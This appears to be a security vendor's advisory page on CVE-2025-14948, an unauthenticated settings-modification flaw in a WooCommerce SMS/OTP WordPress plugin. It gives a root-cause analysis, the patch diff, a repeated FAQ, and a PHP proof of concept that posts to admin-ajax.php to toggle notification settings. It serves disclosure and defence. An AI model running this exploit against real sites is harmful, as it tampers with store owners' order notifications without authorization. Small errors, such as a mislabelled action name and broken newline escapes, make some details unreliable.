What is CVE-2025-14948?

CVE-2025-14948 is a medium severity vulnerability in the miniOrange OTP Verification and SMS Notification for WooCommerce plugin for WordPress. It allows unauthenticated attackers to modify SMS notification settings due to a missing authorization check on the AJAX action ‘enable_wc_sms_notification’.

How does this vulnerability work?

The vulnerability exists because the AJAX action ‘enable_wc_sms_notification’ is accessible to unauthenticated users without proper capability checks. Attackers can send a POST request to the WordPress admin-ajax.php endpoint to enable or disable SMS notifications for WooCommerce orders.

Who is affected by this vulnerability?

Any WordPress site using the miniOrange OTP Verification and SMS Notification for WooCommerce plugin version 4.3.8 or earlier is affected. Administrators should check their plugin version to determine if they need to take action.

How can I check if my site is vulnerable?

To check if your site is vulnerable, log in to your WordPress admin panel, navigate to the Plugins section, and look for the miniOrange OTP Verification and SMS Notification plugin. If the version is 4.3.8 or earlier, your site is vulnerable.

How can I fix this vulnerability?

To fix this vulnerability, update the miniOrange OTP Verification and SMS Notification plugin to version 4.3.9 or later. This version includes a patch that restricts the AJAX action to authenticated users and adds capability checks.

What does the CVSS score of 5.3 mean?

A CVSS score of 5.3 indicates a medium severity vulnerability. This means that while the vulnerability does not pose an immediate threat of data exposure or system compromise, it can lead to unauthorized modifications that may disrupt business operations.

What are the practical risks associated with this vulnerability?

The practical risks include unauthorized changes to SMS notification settings, potentially disabling important order notifications. This could lead to missed order confirmations and alerts, affecting customer communication and business operations.

How does the proof of concept demonstrate the vulnerability?

The proof of concept illustrates how an attacker can exploit the vulnerability by sending a crafted POST request to the vulnerable AJAX endpoint. It shows how to toggle notification settings without authentication, effectively demonstrating the ease of exploitation.

What changes were made in the patched version?

In version 4.3.9, the plugin was updated to remove the unauthenticated AJAX action registration and to add capability checks to ensure only users with ‘manage_options’ can modify settings. This significantly enhances the security of the plugin.

What should I do if I cannot update the plugin immediately?

If immediate updating is not possible, consider disabling the miniOrange OTP Verification and SMS Notification plugin until you can apply the patch. Additionally, monitor your site for any unauthorized changes to settings.

Are there any other security measures I should consider?

In addition to updating plugins, ensure your WordPress installation and all other plugins are up to date. Implement security measures such as strong passwords, two-factor authentication, and regular security audits to minimize risks.

Where can I find more information about this vulnerability?

More information can be found on the official CVE database, security advisories from the plugin author, and security blogs that analyze vulnerabilities. Staying informed through these resources can help you manage risks effectively.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-14948: miniOrange OTP Verification and SMS Notification for WooCommerce <= 4.3.8 – Missing Authorization to Unauthenticated Notification Settings Modification (miniorange-sms-order-notification-otp-verification)

CVE ID CVE-2025-14948

Plugin miniorange-sms-order-notification-otp-verification

Severity Medium (CVSS 5.3)

CWE 862

Vulnerable Version 4.3.8

Patched Version 4.3.9

Disclosed January 8, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-14948:
This vulnerability is a missing authorization flaw in the miniOrange OTP Verification and SMS Notification for WooCommerce WordPress plugin. It allows unauthenticated attackers to modify the plugin’s SMS notification settings for WooCommerce orders. The CVSS score of 5.3 indicates a medium severity impact.

The root cause is the plugin’s AJAX handler function `enable_wc_sms_notification` lacking proper capability and nonce checks. In the vulnerable version, the file `notifications/wcsmsnotification/handler/class-woocommercenotifications.php` registered the action `enable_wc_sms_notification` for both authenticated (`wp_ajax_`) and unauthenticated (`wp_ajax_nopriv_`) users on line 71. The function itself, defined starting at line 142, only performed a nonce check. It did not verify if the requesting user had administrative privileges, such as the `manage_options` capability.

Exploitation involves sending a POST request to the WordPress `admin-ajax.php` endpoint. The attacker sets the `action` parameter to `mo_wc_notification_enable`. The request must also include a `notification` POST parameter containing the specific notification type to enable or disable. The attack succeeds because the endpoint is accessible to unauthenticated users and the handler lacks an authorization check.

The patch in version 4.3.9 addresses the issue with two key changes. First, line 71 removes the `wp_ajax_nopriv_` hook registration, restricting the endpoint to authenticated users only. Second, the `enable_wc_sms_notification` function is updated. Lines 143-152 add a check for the `current_user_can(‘manage_options’)` capability, ensuring only administrators can proceed. The patch also strengthens the nonce verification by adding a nonce key and value to the localized script on lines 130-131 and using `check_ajax_referer` on line 154.

Successful exploitation allows an unauthenticated attacker to toggle the plugin’s SMS notification settings on or off. This could disrupt store operations by disabling order confirmations or administrative alerts sent via SMS. While the vulnerability does not directly lead to data exposure or code execution, it enables unauthorized modification of a critical business function, impacting the integrity of the WooCommerce store’s notification system.

Differential between vulnerable and patched code

Code Diff

--- a/miniorange-sms-order-notification-otp-verification/autoload.php
+++ b/miniorange-sms-order-notification-otp-verification/autoload.php
@@ -181,7 +181,7 @@
 			$package = wp_json_encode(
 				array(
 					'name'         => 'miniorange-otp-verification',
-					'version'      => '4.3.8',
+					'version'      => '4.3.9',
 					'type'         => 'MiniOrangeGateway',
 					'testmode'     => false,
 					'failmode'     => false,
--- a/miniorange-sms-order-notification-otp-verification/miniorange_validation_settings.php
+++ b/miniorange-sms-order-notification-otp-verification/miniorange_validation_settings.php
@@ -3,7 +3,7 @@
  * Plugin Name: miniOrange OTP Verification and SMS Notification for WooCommerce
  * Plugin URI: http://miniorange.com/miniorange-woocommerce-otp-plugin
  * Description: WooCommerce SMS Notification. WCFM & Dokan Notifications. SMS & Email OTP Verification for all WooCommerce forms. PasswordLess Login. 24/7 support.
- * Version: 4.3.8
+ * Version: 4.3.9
  * Author: miniOrange
  * Author URI: http://miniorange.com
  * Text Domain: miniorange-order-notifications-woocommerce
--- a/miniorange-sms-order-notification-otp-verification/notifications/wcsmsnotification/handler/class-woocommercenotifications.php
+++ b/miniorange-sms-order-notification-otp-verification/notifications/wcsmsnotification/handler/class-woocommercenotifications.php
@@ -56,6 +56,10 @@
 	protected function __construct() {
 		parent::__construct();

+		// Initialize nonce for security checks.
+		$this->nonce     = 'mo_admin_actions';
+		$this->nonce_key = 'security';
+
 		add_action( 'admin_enqueue_scripts', array( $this, 'mo_wc_sms_notif_settings_style' ) );
 		add_action( 'admin_enqueue_scripts', array( $this, 'mo_wc_sms_notif_settings_script' ) );

@@ -64,7 +68,7 @@

 		$this->enable_notification_action = 'mo_wc_notification_enable';

-		add_action( 'wp_ajax_nopriv_' . $this->enable_notification_action, array( $this, 'enable_wc_sms_notification' ) );
+		// Only allow authenticated users with proper permissions to access this AJAX endpoint.
 		add_action( 'wp_ajax_' . $this->enable_notification_action, array( $this, 'enable_wc_sms_notification' ) );

 		add_action( 'woocommerce_created_customer_notification', array( $this, 'mo_send_new_customer_sms_notif' ), 1, 3 );
@@ -118,16 +122,18 @@
 	 * @return void
 	 */
 	public function mo_wc_sms_notif_settings_script() {
-				wp_register_script( 'settingswcnotif', MOWC_MSN_JS_URL, array( 'jquery' ), WC_MSN_VERSION, false );
-				wp_localize_script(
-					'settingswcnotif',
-					'mowcsmsvar',
-					array(
-						'siteURL' => wp_wc_ajax_url(),
-						'action'  => $this->enable_notification_action,
-					)
-				);
-				wp_enqueue_script( 'settingswcnotif' );
+		wp_register_script( 'settingswcnotif', MOWC_MSN_JS_URL, array( 'jquery' ), WC_MSN_VERSION, false );
+		wp_localize_script(
+			'settingswcnotif',
+			'mowcsmsvar',
+			array(
+				'siteURL'  => wp_wc_ajax_url(),
+				'action'   => $this->enable_notification_action,
+				'nonce'    => wp_create_nonce( $this->nonce ),
+				'nonceKey' => $this->nonce_key,
+			)
+		);
+		wp_enqueue_script( 'settingswcnotif' );
 	}

 	/**
@@ -136,7 +142,19 @@
 	 * @return void
 	 */
 	public function enable_wc_sms_notification() {
-		if ( array_key_exists( 'option', $_POST ) && ! check_ajax_referer( $this->nonce, $this->nonce_key ) ) {
+		// Check if user has proper authorization (admin only).
+		if ( ! current_user_can( 'manage_options' ) ) {
+			wp_send_json(
+				MoUtility::create_json(
+					MoMessages::showMessage( BaseMessages::INVALID_OP ),
+					MoConstants::ERROR_JSON_TYPE
+				)
+			);
+			exit;
+		}
+
+		// Verify nonce to prevent CSRF attacks.
+		if ( ! check_ajax_referer( $this->nonce, $this->nonce_key, false ) ) {
 			wp_send_json(
 				MoUtility::create_json(
 					MoMessages::showMessage( BaseMessages::INVALID_OP ),
@@ -145,6 +163,7 @@
 			);
 			exit;
 		}
+
 		if ( isset( $_POST['notification'] ) ) {
 			$wc_notification_type = sanitize_text_field( wp_unslash( $_POST['notification'] ) );
 		}

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-14948 - miniOrange OTP Verification and SMS Notification for WooCommerce <= 4.3.8 - Missing Authorization to Unauthenticated Notification Settings Modification

<?php

$target_url = 'http://target-site.com/wp-admin/admin-ajax.php'; // CHANGE THIS

// The vulnerable AJAX action hook.
$ajax_action = 'mo_wc_notification_enable';

// The POST data to toggle a notification setting.
// The 'notification' parameter value must match a specific notification type configured in the plugin.
$post_data = array(
    'action' => $ajax_action,
    'notification' => 'wc_order_status_completed' // Example notification type
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

// Execute the request as an unauthenticated user.
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Check the response.
echo "HTTP Status: $http_coden";
echo "Response: $responsen";
// A successful exploitation attempt will typically return a JSON response.
// The exact success/failure message depends on the plugin's internal logic and the provided 'notification' value.

?>

Frequently Asked Questions

What is CVE-2025-14948?
Understanding the vulnerability
CVE-2025-14948 is a medium severity vulnerability in the miniOrange OTP Verification and SMS Notification for WooCommerce plugin for WordPress. It allows unauthenticated attackers to modify SMS notification settings due to a missing authorization check on the AJAX action ‘enable_wc_sms_notification’.
How does this vulnerability work?
Mechanics of the exploitation
The vulnerability exists because the AJAX action ‘enable_wc_sms_notification’ is accessible to unauthenticated users without proper capability checks. Attackers can send a POST request to the WordPress admin-ajax.php endpoint to enable or disable SMS notifications for WooCommerce orders.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the miniOrange OTP Verification and SMS Notification for WooCommerce plugin version 4.3.8 or earlier is affected. Administrators should check their plugin version to determine if they need to take action.
How can I check if my site is vulnerable?
Verifying your plugin version
To check if your site is vulnerable, log in to your WordPress admin panel, navigate to the Plugins section, and look for the miniOrange OTP Verification and SMS Notification plugin. If the version is 4.3.8 or earlier, your site is vulnerable.
How can I fix this vulnerability?
Steps to secure your site
To fix this vulnerability, update the miniOrange OTP Verification and SMS Notification plugin to version 4.3.9 or later. This version includes a patch that restricts the AJAX action to authenticated users and adds capability checks.
What does the CVSS score of 5.3 mean?
Understanding the severity rating
A CVSS score of 5.3 indicates a medium severity vulnerability. This means that while the vulnerability does not pose an immediate threat of data exposure or system compromise, it can lead to unauthorized modifications that may disrupt business operations.
What are the practical risks associated with this vulnerability?
Impact on business operations
The practical risks include unauthorized changes to SMS notification settings, potentially disabling important order notifications. This could lead to missed order confirmations and alerts, affecting customer communication and business operations.
How does the proof of concept demonstrate the vulnerability?
Example of exploitation
The proof of concept illustrates how an attacker can exploit the vulnerability by sending a crafted POST request to the vulnerable AJAX endpoint. It shows how to toggle notification settings without authentication, effectively demonstrating the ease of exploitation.
What changes were made in the patched version?
Improvements in version 4.3.9
In version 4.3.9, the plugin was updated to remove the unauthenticated AJAX action registration and to add capability checks to ensure only users with ‘manage_options’ can modify settings. This significantly enhances the security of the plugin.
What should I do if I cannot update the plugin immediately?
Mitigation strategies
If immediate updating is not possible, consider disabling the miniOrange OTP Verification and SMS Notification plugin until you can apply the patch. Additionally, monitor your site for any unauthorized changes to settings.
Are there any other security measures I should consider?
Best practices for WordPress security
In addition to updating plugins, ensure your WordPress installation and all other plugins are up to date. Implement security measures such as strong passwords, two-factor authentication, and regular security audits to minimize risks.
Where can I find more information about this vulnerability?
Resources for further reading
More information can be found on the official CVE database, security advisories from the plugin author, and security blogs that analyze vulnerabilities. Staying informed through these resources can help you manage risks effectively.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations